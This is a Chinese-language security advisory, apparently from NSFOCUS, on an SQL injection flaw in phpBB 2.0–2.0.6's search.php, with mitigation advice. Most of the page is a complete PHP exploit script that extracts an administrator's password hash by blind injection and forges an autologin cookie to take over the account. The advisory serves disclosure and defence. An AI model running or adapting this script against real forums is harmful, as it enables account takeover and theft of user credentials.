首页 -> 安全研究
安全研究
安全漏洞
phpBB搜索脚本SQL注入漏洞
发布日期:2004-03-14
更新日期:2004-03-18
受影响系统:
phpBB Group phpBB 2.0.6描述:
phpBB Group phpBB 2.0.5
phpBB Group phpBB 2.0.4
phpBB Group phpBB 2.0.3
phpBB Group phpBB 2.0.2
phpBB Group phpBB 2.0.1
phpBB Group phpBB 2.0
phpBB2是一款由PHP编写的WEB论坛应用程序,支持多种数据库系统,可使用在多种Unix和Linux操作系统下。
phpBB2包含的search.php对用户提交的参数缺少充分过滤,远程攻击者可以利用这个漏洞进行SQL注入攻击,可以获得系统敏感信息。
问题是search.php脚本对"$search_results"参数缺少充分过滤,攻击者可以提交包含恶意SQL命令给这个参数,可导致修改原有的SQL逻辑,获得数据库信息或修改数据库。经过测试,可利用此漏洞获得管理员密码HASH信息,利用phpBB的自动登录功能可以不需要破解密码登录系统。
<*来源:pokley (saleh@scan-associates.net)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=107936796823781&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
#!/usr/bin/php -q
phpBB 2.0.6 fetch password hash by pokleyzz <pokleyzz at scan-associates.net>
<?php
/*
# phpBB 2.0.6 fetch password hash by pokleyzz <pokleyzz at scan-associates.net>
# 4th January 2004 : 3:05 a.m
#
# bug found by pokleyzz (4th January 2004 )
#
# Requirement:
# PHP 4.x with curl extension;
#
# Greet:
# tynon, sk ,wanvadder, sir_flyguy, wxyz , tenukboncit, kerengga_kurus ,
# s0cket370 , b0iler and ...
#
#
# ----------------------------------------------------------------------------
# "TEH TARIK-WARE LICENSE" (Revision 1):
# wrote this file. As long as you retain this notice you
# can do whatever you want with this stuff. If we meet some day, and you think
# this stuff is worth it, you can buy me a "teh tarik" in return.
# ----------------------------------------------------------------------------
# (Base on Poul-Henning Kamp Beerware)
#
# Tribute to Search + Wings - "gemuruh.mp3" :P
#
*/
// a:2:{s:11:"autologinid";s:32:"e10adc3949ba59abbe56e057f20f883e";s:6:"userid";s:1:"2";}
$start=time();
if (!(function_exists('curl_init'))) {
echo "cURL extension required\n";
exit;
}
ini_set("max_execution_time","999999");
$matches="mode=viewprofile";
$charmap=array (48,49,50,51,52,53,54,55,56,57,
97,98,99,100,101,102,
103,104,105,
106,107,108,109,110,111,112,113,
114,115,116,117,118,119,120,121,122
);
if($argv[3]){
$url=$argv[1];
$username=$argv[2];
//$userid=$argv[2];
$topic_id=$argv[3];
if ($argv[4])
$proxy=$argv[4];
}
else {
echo "Usage: ".$argv[0]." <URL> <username> <topic_id> [proxy]\n\n";
echo "\tURL\t URL to phpnBB site (ex: http://127.0.0.1/html)\n";
echo "\taid\t username to get (ex: admin)\n";
echo "\ttopic_id\t topic id where user have post (ex: 1,2,3,45,6)\n";
echo "\tproxy\t optional proxy url (ex: http://10.10.10.10:8080)\n";
exit;
}
//$action="/search.php?search_id=unanswered";
$action="/search.php?search_id=test";
//$postvar="total_match_count=1&search_forum=1&search_ids[]=";
$postvar="show_results=topics&search_results=";
// detect if sql injection allowed
$ch=curl_init();
if ($proxy){
curl_setopt($ch, CURLOPT_PROXY,$proxy);
}
curl_setopt($ch, CURLOPT_URL,$url.$action);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $postvar."'");
$res=curl_exec ($ch);
curl_close ($ch);
//echo $res;
if (!ereg("General Error",$res)){
echo "Not vulnerable. register_global=off\n";
exit();
}
$i=0;
$tmp="char(";
while ($i < strlen($username)){
$tmp .= ord(substr($username,$i,1));
$i++;
if ($i < strlen($username)){
$tmp .= ",";
}
}
$tmp .= ")";
$cusername=$tmp;
// get userid and data cookie name
//$sql="$topic_id)+AND+pt.post_id=p.post_id+AND+f.forum_id=p.forum_id+AND+p.topic_id=t.topic_id+AND+p.poster_id=u.user_id+and+u.username={$cusername}+ORDER+BY+p.post_time+DESC+LIMIT+0,2/*";
//$sql="99999)+or+(+p.forum_id=$topic_id+and+pt.post_id=p.post_id+AND+f.forum_id=p.forum_id+AND+p.topic_id=t.topic_id+AND+p.poster_id=u.user_id+and+u.username={$cusername}+)+ORDER+BY+p.post_time+DESC+LIMIT+0,15/*";
//$sql="999999)+or+(u.username={$cusername})+LIMIT+0,2/*";
$sql = "$topic_id)+AND+t.topic_poster=u.user_id+AND+f.forum_id=t.forum_id+AND+p.post_id=t.topic_first_post_id+AND+p2.post_id=t.topic_last_post_id+AND+u2.user_id=p2.poster_id+and+u.username={$cusername}+LIMIT+0,2/*";
$ch=curl_init();
if ($proxy){
curl_setopt($ch, CURLOPT_PROXY,$proxy);
}
curl_setopt($ch, CURLOPT_URL,$url.$action);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $postvar.$sql);
$res=curl_exec ($ch);
curl_close ($ch);
preg_match("/ (.)*_data=/",$res,$ap);
$cookiename=trim(ereg_replace("=","",$ap[0]));
if (preg_match("/mode=viewprofile&u=.*>$username/i",$res,$ap)){
preg_match("/mode=viewprofile&u=[0-9]+/i",$ap[0],$ap2);
$userid=preg_replace("/mode=viewprofile&u=/","",$ap2[0]);
echo $userid;
}
else {
echo "\n[x] Error occur... no result for this topic id\n";
exit();
}
echo "Take your time for Teh Tarik... please wait ...\n\n";
echo "Result:\n";
echo "\t{$userid}:${username}:";
//get password hash
for($i= 1;$i< 33;$i++){
foreach ($charmap as $char){
echo chr($char);
$sql="$topic_id)+AND+t.topic_poster=u.user_id+AND+f.forum_id=t.forum_id+AND+p.post_id=t.topic_first_post_id+AND+p2.post_id=t.topic_last_post_id+AND+u2.user_id=p2.poster_id+and+u.user_id={$userid}+and+ascii(substring(u.user_password,$i,1))={$char}+LIMIT+0,2/*";
$ch=curl_init();
if ($proxy){
curl_setopt($ch, CURLOPT_PROXY,$proxy);
}
curl_setopt($ch, CURLOPT_URL,$url.$action);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $postvar.$sql);
$res=curl_exec ($ch);
curl_close ($ch);
if (ereg($matches,$res)){
//echo chr($char);
$password .= chr($char);
break 1;
}
else {
echo chr(8);
}
if ($char ==103){
echo "\n\n[x] Something wrong occur possibly network not stable...\n";
exit();
}
}
}
$autologin=array();
$autologin["autologinid"]=trim($password);
$autologin["userid"]=trim($userid);
$res=serialize($autologin);
$res=ereg_replace(";","%3B",$res);
echo "\n\nAuto login cookies:\n\t{$cookiename}={$res}\n";
?>
建议:
临时解决方法:
如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
* 在php.ini文件中关闭register_global选项。
厂商补丁:
phpBB Group
-----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.phpbb.com/
浏览次数:4936
严重程度:0(网友投票)
绿盟科技给您安全的保障